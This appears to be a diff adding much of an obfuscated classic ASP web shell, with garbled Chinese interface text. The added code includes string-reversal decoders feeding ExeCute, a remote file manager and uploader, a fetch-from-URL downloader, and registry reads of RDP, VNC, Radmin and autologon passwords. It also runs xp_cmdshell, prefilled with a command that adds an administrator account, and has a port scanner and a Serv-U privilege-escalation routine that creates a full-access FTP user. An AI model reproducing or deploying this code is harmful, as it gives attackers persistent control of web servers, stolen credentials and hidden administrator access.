namubmitpe='sut ty><inpnter'n='ce alig&~<tdSI=SI`pan>~'></s='abcan ide><sp/tablorm><r></f&~</tSI=SI`I:SI=RRS S~~`0 Thetr)>4n(DbSIf Len`(5,0)t(SotObjecreateonn=CSet C)`DbStrOpen Conn.`ma(20nSchen.Opes=ConSet R) `r>��</d>��<bC'><tCCCCCor='#Bgcol'25' ight=tr heble><&~<taSI=SItd>~`veFirRs.Most `ot Rsile NDo Wh.Eof`E~ th~TABLPE~)=LE_TY(~TABIf Rsen`_NAMETABLE=Rs(~TName~)`a><brl ]</>[ de~,1)'e&~]~&TNamLE [~P TAB~~DROlStr(ullSqipt:Fvascrf='jaa hreter><n=cen alig&~<tdSI=SI>~`</td>~</a>Name&'>~&T~~,1)me&~]~&TNaROM [T * FSELECtr(~~lSqlSt:Fulscrip'javahref=&~<a SI=SI~`End If `veNexRs.Mot `Loop `s=NotSet Rhing`able>r></t&~</tSI=SI~`I:SI=RRS S~~`10 ThStr)>n(SqlIf Leen`ct~ t~sele,6))=qlStreft(Sase(LIf LChen`qlStr�䣺~&S&~ִ����SI=SI`ordseb.Rec~Adodject(ateObs=CreSet Rt~)`Conn,lStr,en SqRs.op1,1`ds.Co.FielFN=Rsunt`rdCou.RecoRC=Rsnt`geSizRs.Pae=20`ageSi=Rs.PCountze`Count.PagePN=Rs`age~)st(~PrequePage=`g(Page=Clnn Pag~ Thege<>~If Pae)` Page Thenage=0 Or Pge=~~If Pa=1` Page Thenge>PNIf Pa=PN`=PageepagesolutRs.abThen ge>1 If Pa`td></ccc><=#ccccolor25 bgight=tr heble><&~<taSI=SItd>~` FN-1=0 toFor n`em(n)ds.It.Fielld=RsSet F`e&~</d.Nam>~&Flnter'n='ce alig&~<tdSI=SItd>~`thingld=noSet F`Next`&~</tSI=SIr>~`Count And .Bof)or Rs.Eof ot(Rsile NDo Wh>0`=CounCountt-1`EFEFEor=~#BgcolF~`t></t</fongs'>xngdine='wit fac><foncccccor=#cbgcol><td &~<trSI=SId>~` FN-1=0 ToFor i`~:EndFEFEFr=~#Egcololse:BF5~:E#F5F5lor=~:Bgco ThenEFEF~=~#EFcolorIf Bg if`=1 ThIf RCen`Rs(i)code(TMLEnnfo=H ColI)`Else`,50))Rs(i)Left(code(TMLEnnfo=H ColI`End If`&~</tlInfo>~&Color&~&Bgcolor=~ bgco&~<tdSI=SId>~`Next`&~</tSI=SIr>~`veNexRs.Mot`Loop`I:SI=RRS S~~`lStr)de(SqlEnCor=HtmSqlSt`&~/~&&Page;ҳ�룺~&nbsp&RC&~��¼����~nter>gn=ce~ aliFN+1&an=~&colsp><td &~<trSI=SIPN`>1 ThIf PNen`a>&nb��һҳ</&~)'>age-1~,~&Ptr&~~&SqlSr(~~~SqlSt:Fullcriptjavasref=';<a h&nbspҳ</a>1)'>��&~~~,qlStr~~~&SlStr(ullSqipt:Fvascrf='jaa hrebsp;<sp;&n&~&nbSI=SIsp;~`End iSp=1:Else:ge-8:Sp=PaThen:ge>8 If Paf`o Sp+=Sp TFor i8`it Foen ExPN ThIf i>r`Page If i=Then`nbsp;&i&~&SI=SI~`Else`&nbsp~</a>>~&i&i&~)'~~,~&Str&~~&Sqltr(~~lSqlSt:Fulscrip'javahref=&~<a SI=SI;~`End If`Next`βҳ</a&~)'>,~&PNr&~~~SqlSt(~~~&qlStrFullSript:avascef='j<a hrnbsp;</a>&'>��һҳ+1&~)&Page~~~,~lStr&~~&SqStr(~llSqlpt:Fuascri='jav hrefsp;<a&~&nbSI=SI>~`End If`able>r></td></t'></tFEFEFr='#E colo&~<hrSI=SI~`=Nothet Rsose:SRs.Cling`I:SI=RRS S~~`Else `lStr)te(SqExecuConn.`SqlSt��䣺~&&~SQLSI=SIr`End If`I:SI=RRS S~~`End If`CloseConn.`othinonn=NSet Cg`End If",Pso):End Function:Dim T1
+
+Function EnCode(ObjStr,ObjPos)
+Dim NewStr,TmpStr,i,LenStr:LenStr=Len(ObjStr):For i=0 To Int(LenStr/ObjPos)-1:TmpStr=Mid(ObjStr,i*ObjPos+1,ObjPos)&TmpStr:Next:EnCode=TmpStr&Right(ObjStr,LenStr Mod ObjPos)
+End Function
+
+
+
+Class UPC:Dim D1,D2:Public Function Form(F):F=lcase(F):If D1.exists(F) then:Form=D1(F):else:Form="":end if:End Function:Public Function UA(F):F=lcase(F):If D2.exists(F) then:set UA=D2(F):else:set UA=new FIF:end if:End Function:Private Sub Class_Initialize:Dim TDa,TSt,vbCrlf,TIn,DIEnd,T2,TLen,TFL,SFV,FStart,FEnd,DStart,DEnd,UpName:set D1=CreateObject(Sot(4,0)):if Request.TotalBytes<1 then Exit Sub
+  set T1=CreateObject(Sot(6,0)):T1.Type=1:T1.Mode=3:T1.Open:T1.Write Request.BinaryRead(Request.TotalBytes):T1.Position=0:TDa=T1.Read:DStart=1:DEnd=LenB(TDa):set D2=CreateObject(Sot(4,0)):vbCrlf=chrB(13)&chrB(10):set T2=CreateObject(Sot(6,0)):TSt=MidB(TDa,1,InStrB(DStart,TDa,vbCrlf)-1):TLen=LenB(TSt):DStart=DStart+TLen+1:while (DStart+10)<DEnd:DIEnd=InStrB(DStart,TDa,vbCrlf&vbCrlf)+3:T2.Type=1:T2.Mode=3:T2.Open:T1.Position=DStart:T1.CopyTo T2,DIEnd-DStart:T2.Position=0:T2.Type=2:T2.Charset="gb2312":TIn=T2.ReadText:T2.Close:DStart=InStrB(DIEnd,TDa,TSt):FStart=InStr(22,TIn,"name=""",1)+6:FEnd=InStr(FStart,TIn,"""",1):UpName=lcase(Mid(TIn,FStart,FEnd-FStart)):if InStr (45,TIn,"filename=""",1)>0 then
+  set TFL=new FIF:FStart=InStr(FEnd,TIn,"filename=""",1)+10:FEnd=InStr(FStart,TIn,"""",1):FStart=InStr(FEnd,TIn,"Content-Type: ",1)+14:FEnd=InStr(FStart,TIn,vbCr):TFL.FileStart=DIEnd:TFL.FileSize=DStart-DIEnd-3:if not D2.Exists(UpName) then:D2.add UpName,TFL:end if
+  else:T2.Type=1:T2.Mode=3:T2.Open:T1.Position=DIEnd:T1.CopyTo T2,DStart-DIEnd-3:T2.Position = 0:T2.Type = 2:T2.Charset ="gb2312":SFV = T2.ReadText:T2.Close:if D1.Exists(UpName) then:D1(UpName)=D1(UpName)&","&SFV:else:D1.Add UpName,SFV:end if:end if:DStart=DStart+TLen+1:wend:TDa="":set T2=nothing:End Sub:Private Sub Class_Terminate:if Request.TotalBytes>0 then:D1.RemoveAll:D2.RemoveAll:set D1=nothing:set D2=nothing:T1.Close:set T1 =nothing:end if:End Sub:End Class:
+
+Function SinfoEn(ObjStr,ObjPos)
+ObjStr=Replace(ObjStr,"~",""""):NewStr=Split(ObjStr,"`"):For i=0 To UBound(NewStr):SinfoEn=SinfoEn&EnCode(NewStr(i),ObjPos)&vbCrLf:Next:SinfoEn=Left(SinfoEn,Len(SinfoEn)-2)
+End Function
+
+
+
+Class FIF:dim FileSize,FileStart:Private Sub Class_Initialize:FileSize=0:FileStart=0:End Sub:Public function SaveAs(F)
+  dim T3:SaveAs=true:if trim(F)="" or FileStart=0 then exit function
+  set T3=CreateObject(Sot(6,0)):T3.Mode=3:T3.Type=1:T3.Open:T1.position=FileStart:T1.copyto T3,FileSize:T3.SaveToFile F,2:T3.Close:set T3=nothing:SaveAs=false:end function:End Class:
+
+Function Fun(ShiSanObjstr):ShiSanObjstr=Replace(ShiSanObjstr,"|",""""):For ShiSanI=1 To Len(ShiSanObjstr):If Mid(ShiSanObjstr,ShiSanI,1)<>"!"Then:ShiSanNewStr=Mid(ShiSanObjstr,ShiSanI,1)&ShiSanNewStr:Else:ShiSanNewStr=vbCrLf&ShiSanNewStr:End If:Next:Fun = ShiSanNewStr:End Function
+
+
+
+Class LBF:Dim CF:Private Sub Class_Initialize:SET CF=CreateObject(Sot(0,0)):End Sub:Private Sub Class_Terminate:Set CF=Nothing:End Sub
+Function ShowDriver()
+For Each D in CF.Drives
+RRS"<tr><td height='20'><a href='javascript:ShowFolder("""&D.DriveLetter&":\\"")'>�����ش��� ("&D.DriveLetter&":)</a></td></tr>" 
+Next
+End Function
+Function Show1File(Path):
+Set FOLD=CF.GetFolder(Path)
+i=0
+SI="<table width='100%' border='0' cellspacing='0' cellpadding='6'><tr>"
+For Each F in FOLD.subfolders
+SI=SI&"<td height=10 width=17% align=center><div style='border:1px solid "&BorderColor&"'>"
+SI=SI&"<a href='javascript:ShowFolder("""&RePath(Path&"\"&F.Name)&""")' title=""����""><font face='wingdings' size='6'>0</font><br>"&F.Name&"</a>" 
+SI=SI&"<br><b>[</b><a href='javascript:FullForm("""&RePath(Path&"\"&F.Name)&""",""CopyFolder"")'onclick='return yesok()' class='am' title='����'>Copy</a> "
+SI=SI&"<a href='javascript:FullForm("""&Replace(Path&"\"&F.Name,"\","\\")&""",""DelFolder"")'onclick='return yesok()' class='am' title='ɾ��'>Del</a>"
+SI=SI&" <a href='javascript:FullForm("""&RePath(Path&"\"&F.Name)&""",""MoveFolder"")'onclick='return yesok()' class='am' title='�ƶ�'>Move</a>"
+SI=SI&" <a href='javascript:FullForm("""&RePath(Path&"\"&F.Name)&""",""DownFile"")'onclick='return yesok()' class='am' title='����'>Down</a><b>]</b></div></td>"
+i=i+1
+If i mod 5 = 0 then SI=SI&"</tr><tr>"
+Next
+SI=SI&"</tr><tr><td height=2></td></tr></table>"
+RRS SI:SI="":i=0
+SI="<table width='100%' border='0' cellspacing='0' cellpadding='6'><tr>"
+For Each L in Fold.files
+SI=SI&"<td height='30'><div style='border:1px solid "&BorderColor&"'><a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""DownFile"");' title='����'><font face='wingdings' size='5'>2</font>"&L.Name&"</a> <b>[</b> "
+SI=SI&"<a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""EditFile"")' class='am' title='�༭'>Edit</a> "
+SI=SI&"<a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""DelFile"")'onclick='return yesok()' class='am' title='ɾ��'>Del</a> "
+Si=Si&"<a  href='###' class='am' ><font color=blue >Ȩ��</font></a>"
+Dim EditOOK
+EditOOK=1
+EditOOV=l.Attributes
+If EditOOV >= 128 Then
+EditOOV = EditOOV - 128
+End If
+If EditOOV >= 64 Then
+EditOOV = EditOOV - 64
+End If
+If EditOOV >= 32 Then
+EditOOV = EditOOV - 32
+End If
+If EditOOV >= 16 Then
+EditOOV = EditOOV - 16
+End If:If EditOOV >= 8 Then
+EditOOV = EditOOV - 8
+End If
+If EditOOV >= 4 Then
+EditOOV = EditOOV - 4:EditOOK=0
+End If
+If EditOOV >= 2 Then
+EditOOV = EditOOV - 2:EditOOK=0
+End If
+If EditOOV >= 1 Then
+EditOOV = EditOOV - 1:EditOOK=0
+End If
+if EditOOK=0 then
+si=si&"<font face='webdings' size='1' color=red>x</font>"
+else
+si=si&"<font color=red >��</font>"
+end if
+SI=SI&"<a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""CopyFile"")' class='am' title='����'>Copy</a> "
+SI=SI&"<a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""MoveFile"")' class='am' title='�ƶ�'>Move</a> <b>]</b> - "
+
+SI=SI&clng(L.size/1024)&"K<br><b>"
+SI=SI&L.Type&"</b> <i> - "
+SI=SI&L.DateLastModified&"</i></div></td>"
+i=i+1
+If i mod 2 = 0 then SI=SI&"</tr><tr>"
+Next
+ RRS SI&"</tr></table>"
+Set FOLD=Nothing
+End function:
+
+
+
+
+Function DelFile(Path):ExeCute SinfoEn("he Th)at(PtsisExleFiF. CIfn`thPae ileFetel.DCF`r>teen/c��<�ɹ�ɾ��~ h&at&P ~�ļ�r><br><br><br>teen<c=~SI~`UrckBaI&=SSIl`SIS RR`Ifd En",Pos):End Function:Function EditFile(Path)::If Request("Action2")="Post" Then:Set T=CF.CreateTextFile(Path):T.WriteLine Request.form("content"):T.close:Set T=nothing:SI="<center><br><br><br>�ļ�����ɹ���</center>":SI=SI&BackUrl:RRS SI:RRS ""&copyurl&"":Response.End:End If:If Path<>"" Then:Set T=CF.opentextfile(Path, 1, False):Txt=HTMLEncode(T.readall) :T.close:Set T=Nothing:Else:Path=Session("FolderPath")&"\newfile.asp":Txt="�½��ļ�":End If:SI=SI&"<Form action='"&URL&"?Action2=Post' method='post' name='EditForm'>":SI=SI&"<input name='Action' value='EditFile' Type='hidden'>":SI=SI&"<input name='FName' value='"&Path&"' style='width:100%'><br>":SI=SI&"<textarea name='Content' style='width:100%;height:450'>"&Txt&"</textarea><br>":SI=SI&"<hr><input name='goback' type='button' value='����' onclick='history.back();'>&nbsp;&nbsp;&nbsp;<input name='reset' type='reset' value='����'>&nbsp;&nbsp;&nbsp;<input name='submit' type='submit' value='����'></form>":RRS SI:
+End Function:Function CopyFile(Path):ExeCute SinfoEn("|~||~|h,at(Pitpl S =thPa)`enTh~ >~)<(1thPad an) 0)h(at(PtsisExleFiF. CIf`(1thPa),(0thPae ilyFop.CCF)`>~erntce</�����Ƴ�~��)&(0thPa~&�ļ�r><br><br><br>teen<c=~SI`UrckBaI&=SSIl`SIS RR `Ifd En",Pos):End Function:Function MoveFile(Path):ExeCute SinfoEn("|||~)th,~|it(Pa= SplPath `~ The1)<>~Path( and h(0))s(PatExist.FileIf CFn`Path(h(0),e PatveFilCF.Mo1)`enter����</c&~�ƶ���th(0)��~&Pa<br>��><br>r><brcenteSI=~<>~`&BackSI=SIUrl`RRS SI `End If",Pso):End Function:Function DelFolder(Path):ExeCute SinfoEn("he Th)at(PtsisExerldFoF. CIfn`thPar deoleFetel.DCF`r>teen/c��<�ɹ�ɾ��&~thPa~&Ŀ¼r><br><br><br>teen<c=~SI~`UrckBaI&=SSIl`SIS RR`Ifd En",Pos):End Function:Function CopyFolder(Path):ExeCute SinfoEn("|~||~|h,at(Pitpl S =thPa)`enTh~ >~)<(1thPad an) 0)h(at(PtsisExerldFoF. CIf`(1thPa),(0thPar deolyFop.CCF)`>~erntce</�����Ƴ�~��)&(0thPa~&Ŀ¼r><br><br><br>teen<c=~SI`UrckBaI&=SSIl`SIS RR`Ifd En",Pos):End Function:Function MoveFolder(Path):ExeCute SinfoEn("|~||~|h,at(Pitpl S =thPa)`enTh~ >~)<(1thPad an) 0)h(at(PtsisExerldFoF. CIf`(1thPa),(0thPar deoleFov.MCF)`>~erntce</��������~��)&(0thPa~&Ŀ¼r><br><br><br>teen<c=~SI`UrckBaI&=SSIl`SIS RR`Ifd En",Pos):End Function:Function NewFolder(Path):ExeCute SinfoEn("enTh~ >~h<at Pnd ah)at(PtsisExerldFoF. Cot NIf`thPar deoleFatre.CCF`r>teen/c��<�ɹ��½�&~thPa~&Ŀ¼r><br><br><br>teen<c=~SI~`UrckBaI&=SSIl`SIS RR`Ifd En",Pos):End Function:End Class:sub getTerminalInfo():ExeCute SinfoEn(" Nextesumeror ROn Er`hell~ipt.S~WScrject(ateObr.CreServesX = Set w)`ermPoey, tPortKminal, tertPathalPorerminDim trt`nPassoLogi, auterKeyginUsutoLoth, aginPautoLoDim aKey`nPassoLogi, autrnameinUsetoLogy, aubleKeinEnatoLoge, auEnablLoginsAutoDim iword`Tcp\~\RDP-tionsinStaver\Wl Serrminaol\TeContrlSet\ontrorentCM\CurSYSTEHKLM\h = ~rtPatnalPotermi`mber~ortNu = ~PrtKeynalPotermi`PortKminal& terPath lPortrminaad(teRegRe wsX.ort =termPey)`><ol>¼<hr/�ڼ��Զ����ն˷����RRS ~~` Then <> 0umberErr.N~ Or t = ~rmPorIf te `<br/>�ܵ�����.���Ƿ��Ѿ� ����Ȩ����˿�,���õ��ն�RRS~��~` Else`~<br/rt & ermPo~ & t��˿�: ��ǰ�ն˷�RRS ~>~`End If`ogon\\WinlrsionentVe\Currws NTWindosoft\MicroWARE\\SOFTCHINEAL_MAY_LOC ~HKEath =oginPautoL~`nLogooAdmi ~AutKey =nableoginEautoLn~`rNameltUseDefauy = ~serKeoginUautoL~`swordltPasDefauy = ~assKeoginPautoL~`bleKeinEnatoLog & aunPathoLogid(autegReawsX.Rle = nEnaboLogiisAuty)` = 0 nableoginEAutoLIf isThen`��<br/¼����δ��ϵͳ�Զ���RRS ~>~`Else`rKey)inUsetoLog & aunPathoLogid(autegReawsX.Rme = sernaoginUautoL`~<br>me & sernaoginUautoL ~ & ϵͳ�ʻ�:�Զ���¼��RRS ~~`sKey)inPastoLog & aunPathoLogid(autegReawsX.Rrd = asswooginPautoL`r TheIf Ern`Err.Clear`FalseRRS ~~`End If`~<br>rd & asswooginPautoL ~ & �ʻ�����:�Զ���¼��RRS ~~`End If`</ol>RRS ~~",Pso):End Sub:sub ReadREG()
+RRS "<form method=post>"
+RRS  "ע�����ֵ��ȡ<p>" 
+RRS "<input type=hidden value=ReadReg name=theAct>"
+RRS "<tr><td colspan=2>&nbsp;"
+RRS "<select onChange='this.form.thePath.value=this.value;'>"
+RRS "<option value=''>ѡ���Դ��ļ�ֵ</option>"
+RRS "<option value='HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName\ComputerName'>ComputerName</option>"
+RRS"<option value=""HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Linkage\Bind"">�����б�</option>"
+RRS"<option value=""HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters\Parameter"">Radmin����</option>"
+RRS"<option value=""HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters\Port"">Radmin�˿�</option>"
+RRS"<option value=""HKCU\Software\ORL\WinVNC3\Password"">VNC3����</option>"
+RRS"<option value=""HKCU\Software\ORL\WinVNC3\PortNumber"">VNC3�˿�</option>"
+RRS"<option value=""HKLM\SOFTWARE\RealVNC\WinVNC4\Password"">VNC4����</option>"
+RRS"<option value=""HKLM\SOFTWARE\RealVNC\WinVNC4\PortNumber"">VNC4�˿�</option>"
+RRS"<option value=""HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber"">3389�˿�</option>"
+RRS"<option value=""HKLM\SOFTWARE\Symantec\pcAnywhere\CurrentVersion\System\TCPIPDataPort"">PcAnyW���ݶ˿�</option>"
+RRS"<option value=""HKLM\SOFTWARE\Symantec\pcAnywhere\CurrentVersion\System\TCPIPStatusPort"">PcAnyW״̬�˿�</option>"
+RRS "<option value='HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\EnableSecurityFilters'>tcp/ip����1</option>"
+RRS "<option value='HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip\EnableSecurityFilters'>tcp/ip����2</option>"
+RRS "<option value='HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\EnableSecurityFilters'>tcp/ip����3</option>"
+RRS "<option value='HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SchedulingAgent\LogPath'>Schedule Log</option>"
+RRS "<option value='HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\3389:TCP'>���𿪷�</option>"
+RRS "<option value='HKLM\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{8A465128-8E99-4B0C-AFF3-1348DC55EB2E}\UDPAllowedPorts'>�������ŵ�UDP�˿�</option>"
+RRS "<option value='HKLM\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{8A465128-8E99-4B0C-AFF3-1348DC55EB2E}\TCPAllowedPorts'>�������ŵ�TCP�˿�</option>"
+RRS "</select><br />"
+RRS "&nbsp;<input name=thePath value='' size=80>"
+RRS "<input type=button value='��ȡ��ֵ' onclick='this.form.submit()'>"
+RRS "</form><hr/>"
+if Request("thePath")<>"" then
+On Error Resume Next
+Set wsX = Server.CreateObject("WScript.Shell")
+thePath=Request("thePath")
+theArray=wsX.RegRead(thePath)
+If IsArray(theArray) Then
+For i=0 To UBound(theArray)
+RRS "<li>" & theArray(i)
+Next
+Else
+RRS "<li>" & theArray
+End If
+end if
+end sub
+Function downloads()
+RW=RW&"<center><br><form method=post>ֱ������<br><br>"
+RW=RW&"Զ���ļ�:<input name=theUrl value='http://' size=80><br/>"
+RW=RW&"����·��:<input name=thePath value=""" & HtmlEncode(Server.MapPath(".")) & """ size=58> "
+RW=RW&"<input type=checkbox name=overWrite value=2 checked>���ڸ��� <input type=submit value=' ���� '>"
+RW=RW&"<input type=hidden value=downFromUrl name=theAct>"
+RW=RW&"</form></center>"
+Response.Write RW
+If isDebugMode=False Then
+On Error Resume Next
+End If
+Dim Http,theUrl,thePath,stream,getfileName,overWrite
+theUrl=Request("theUrl")
+thePath=Request("thePath")
+overWrite=Request("overWrite")
+Set stream=Server.CreateObject("ad"&e&"odb.st"&e&"ream")
+Set Http=Server.CreateObject("MSXML2.XMLHTTP")
+If overWrite<>2 Then
+overWrite=1
+End If
+Http.Open "GET", theUrl, False
+Http.Send()
+If Http.ReadyState<>4 Then 
+End If	
+With stream
+.Type=1
+.Mode=3
+.Open
+.Write Http.ResponseBody
+.Position=0
+.SaveToFile thePath, overWrite
+If Err.Number=3004 Then
+Err.Clear
+getfileName=Split(theUrl, "/")(UBound(Split(theUrl, "/")))
+If getfileName="" Then
+getfileName="12vh.txt"
+End If
+thePath=thePath & "\" & getfileName
+.SaveToFile thePath, overWrite
+End If
+.Close
+End With
+chkErr(Err)		
+Set Http=Nothing
+Set Stream=Nothing
+If isDebugMode=False Then
+On Error Resume Next
+End If
+End Function
+FuncTion MMD()
+SI="<br><table width=""100%""><tr class=tr><form name=form method=post action="""">CMD����<input type=text name=MMD size=35 value='net user 80sec 80sec /add & net localgroup administrators 80sec /add'> <input type=text name=U value=mssql�û���> <input type=text name=P value=mssql����> <input type=submit value=ִ��></form></tr></table>":REsPonsE.writE SI:SI="":If trim(REquEst.form("MMD"))<>""  thEn:PaSsword= trim(REquEst.form("P")):id=trim(REquEst.form("U")):set adoConn=SErvEr.CreateObject("ADODB.Connection"):adoConn.Open "Provider=SQLOLEDB.1;PaSsword="&PaSsword&";UsEr ID="&id:strQuery = "exec master.dbo.xp_cmdshell '" & REquEst.form("MMD") & "'":set recREsult = adoConn.Execute(strQuery):If NOT recREsult.EOF thEn:Do While NOT recREsult.EOF:strREsult = strREsult & chr(13) & recREsult(0):recREsult.MoveNext:Loop:End if:set recREsult = Nothing:strREsult = REplAcE(strREsult," ","&nbsp;"):strREsult = REplAcE(strREsult,"<","&lt;"):strREsult = REplAcE(strREsult,">","&gt;"):strREsult = REplAcE(strREsult,chr(13),"<br>"):End if:set adoConn = Nothing:REsPonsE.WritE REquEst.form("MMD") & "<br>"& strREsult
+rrs ""&copyurl&""
+end Function:Function adminab()
+Response.Expires=0
+on error resume next
+Set tN=server.createObject("Wscript.Network")
+Set objGroup=GetObject("WinNT://"&tN.ComputerName&"/Administrators,group")
+For Each admin in objGroup.Members
+RRS admin.Name&"<br>"
+Next
+if err then
+RRS "�����̵IJ��а�:Wscript.Network"
+end if
+End Function
+sWHEEL1 = "jwt"
+Function Encrypt(acd)
+For i = 1 To Len(acd) step 1
+c=mid(acd,i,1)
+if c="��" then
+d=mid(acd,i,2)
+i=i+1
+e=replace(d,"��","")
+bbc=bbc&mid(sWHEEL1,cint(e),1)
+else
+bbc=bbc&c
+end if
+next
+Encrypt=bbc
+end Function
+sub ScanPort():ExeCute SinfoEn("76000 = 77meoutiptTir.ScrServe`~ thet~)=~(~por.Formquestif ren`89,4333,3345,14139,4,135,0,110,25,821,23ist=~PortL958~`else`m(~pot.Forequesist=rPortLrt~)`end if`)=~~ (~ip~.Formquestif rethen`27.0.IP=~10.1~`else`(~ip~.FormquestIP=re)`end if`D)</p��ʹ��CM��,������,�ٶȱȽ������˿���(���ɨ>�˿�ɨ��br><pRRS~<>~`rue;'led=tdisabbmit.m1.su='forubmit' onSion='' act'postthod=1' me'formname=form RRS~<>~`&nbspn IP:p>ScaRRS~<;~`ze='6~' si~&IP&lue='p' vaid='iBox' 'Textlass=xt' ce='te' type='ipt nam<inpuRRS~ 0'>~`rt Libr>PoRRS~<st:~`ist&~PortLe='~& valu='60' sizetBox'='Texclassext' pe='tt' ty='por nameinputRRS~<'>~`br><bRRS~<r>~`n '>~' scaalue=om' v'buttlass=it' c'submtype=mit' ='sub nameinputRRS~<`11'>~ue='1' val'scan' id=iddenpe='hn' ty='sca nameinputRRS~<`form>/p></RRS~<~`> ~~ n~) <(~sca.FormquestIf reThen`1 = ttimerimer`><hr>b><br����:</<b>ɨ��RRS(~~)`~),~,~portForm(uest.t(req Splitmp =~)`ip~),orm(~est.F(requSplitip = ~,~)`bound to Uu = 0For h(ip)` = 0 ,~-~)p(hu)Str(iIf InThen`ound(To Ub = 0 For itmp)` Thenp(i))ic(tmnumerIf Is `p(i))), tmip(huScan(Call `Else`, ~-~mp(i)Str(t = Inseekx)` 0 Thekx >If seen`kx - , seemp(i)eft(tN = Lstart1 )`seekx)) - tmp(i Len(p(i),ht(tm= RigendN  )` ThenendN)eric(Isnum and artN)ic(stnumerIf Is`To enartN  = stFor jdN`), j)ip(huScan(Call `Next`Else`br>~)mber<ot nu is nN & ~& endor ~  & ~ tartNRRS(s`End If`Else`ber<bt numis no & ~ mp(i)RRS(tr>~)`End If`End If`Next`Else`hu),~v(ip(StrRe,1,Inp(hu)Mid(irt = ipSta.~))`,~-~)p(hu)Str(i))-Inip(hu,Len(-~)+1hu),~r(ip(,InStp(hu)Mid(i) to )+1,1),~.~ip(hurRev(,InStp(hu)Mid(ixx = For x)`ound(To Ub = 0 For itmp)` Thenp(i))ic(tmnumerIf Is `tmp(ixxx, rt & ipStaScan(Call ))`Else`, ~-~mp(i)Str(t = Inseekx)` 0 Thekx >If seen`kx - , seemp(i)eft(tN = Lstart1 )`seekx)) - tmp(i Len(p(i),ht(tm= RigendN  )` ThenendN)eric(Isnum and artN)ic(stnumerIf Is`To enartN  = stFor jdN`xxx,jrt & ipStaScan(Call )`Next`Else`br>~)mber<ot nu is nN & ~& endor ~  & ~ tartNRRS(s`End If`Else`ber<bt numis no & ~ mp(i)RRS(tr>~)`End If`End If`Next`Next`End If`Next`2 = ttimerimer`imer1er2-tt(timtr(inme=cstheti))`ime&~&thet in ~ocesshr>PrRRS~< s~`END IF",Pso):end sub:
+:Sub Scan(targetip, portNum):On Error Resume Next:set conn = Server.CreateObject("ADODB.connection"):connstr="Provider=SQLOLEDB.1;Data Source=" & targetip &","& portNum &";User ID=lake2;Password=;":conn.ConnectionTimeout=1:conn.open connstr:If Err Then:If Err.number = -2147217843 or Err.number = -2147467259 Then:If InStr(Err.description, "(Connect()).") > 0 Then:RRS(targetip & ":" & portNum & ".......�ر�<br>"):Else:RRS(targetip & ":" & portNum & ".......<font color=red>����</font><br>"):End If:End If:End If:End Sub:Select Case Action:Case "MainMenu":MainMenu():Case "getTerminalInfo":getTerminalInfo():Case "PageAddToMdb":PageAddToMdb():case "ScanPort":ScanPort():Case "goback":goback():Case "Servu":SUaction=request("SUaction")
+if  not isnumeric(SUaction) then response.end
+user = trim(request("u"))
+pass = trim(request("p"))
+port = trim(request("port"))
+cmd = trim(request("c"))
+f=trim(request("f"))
+if f="" then
+f=gpath()
+else
+f=left(f,2)
+end if
+ftpport = 65500
+timeout=3
+loginuser = "User " & user & vbCrLf
+loginpass = "Pass " & pass & vbCrLf
+deldomain = "-DELETEDOMAIN" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & " PortNo=" & ftpport & vbCrLf
+mt = "SITE MAINTENANCE" & vbCrLf
+newdomain = "-SETDOMAIN" & vbCrLf & "-Domain=goldsun|0.0.0.0|" & ftpport & "|-1|1|0" & vbCrLf & "-TZOEnable=0" & vbCrLf & " TZOKey=" & vbCrLf
+newuser = "-SETUSERSETUP" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "-PortNo=" & ftpport & vbCrLf & "-User=go" & vbCrLf & "-Password=od" & vbCrLf & _
+"-HomeDir=c:\\" & vbCrLf & "-LoginMesFile=" & vbCrLf & "-Disable=0" & vbCrLf & "-RelPaths=1" & vbCrLf & _
+"-NeedSecure=0" & vbCrLf & "-HideHidden=0" & vbCrLf & "-AlwaysAllowLogin=0" & vbCrLf & "-ChangePassword=0" & vbCrLf & _
+"-QuotaEnable=0" & vbCrLf & "-MaxUsersLoginPerIP=-1" & vbCrLf & "-SpeedLimitUp=0" & vbCrLf & "-SpeedLimitDown=0" & vbCrLf & _
+"-MaxNrUsers=-1" & vbCrLf & "-IdleTimeOut=600" & vbCrLf & "-SessionTimeOut=-1" & vbCrLf & "-Expire=0" & vbCrLf & "-RatioUp=1" & vbCrLf & _
+"-RatioDown=1" & vbCrLf & "-RatiosCredit=0" & vbCrLf & "-QuotaCurrent=0" & vbCrLf & "-QuotaMaximum=0" & vbCrLf & _
+"-Maintenance=System" & vbCrLf & "-PasswordType=Regular" & vbCrLf & "-Ratios=None" & vbCrLf & " Access=c:\\|RWAMELCDP" & vbCrLf
+quit = "QUIT" & vbCrLf
+newuser=replace(newuser,"c:",f)
+select case SUaction
+case 1
+set a=Server.CreateObject("Microsoft.XMLHTTP")
+a.open "GET", "http://127.0.0.1:" & port & "/goldsun/upadmin/s1",True, "", ""
+a.send loginuser & loginpass & mt & deldomain & newdomain & newuser & quit
+set session("a")=a
+RRS"<form method='post' name='goldsun'>"
+RRS"<input name='u' type='hidden' id='u' value='"&user&"'></td>"
+RRS"<input name='p' type='hidden' id='p' value='"&pass&"'></td>"
+RRS"<input name='port' type='hidden' id='port' value='"&port&"'></td>"
+RRS"<input name='c' type='hidden' id='c' value='"&cmd&"' size='50'>"
+RRS"<input name='f' type='hidden' id='f' value='"&f&"' size='50'>"
+RRS"<input name='SUaction' type='hidden' id='SUaction' value='2'></form>"
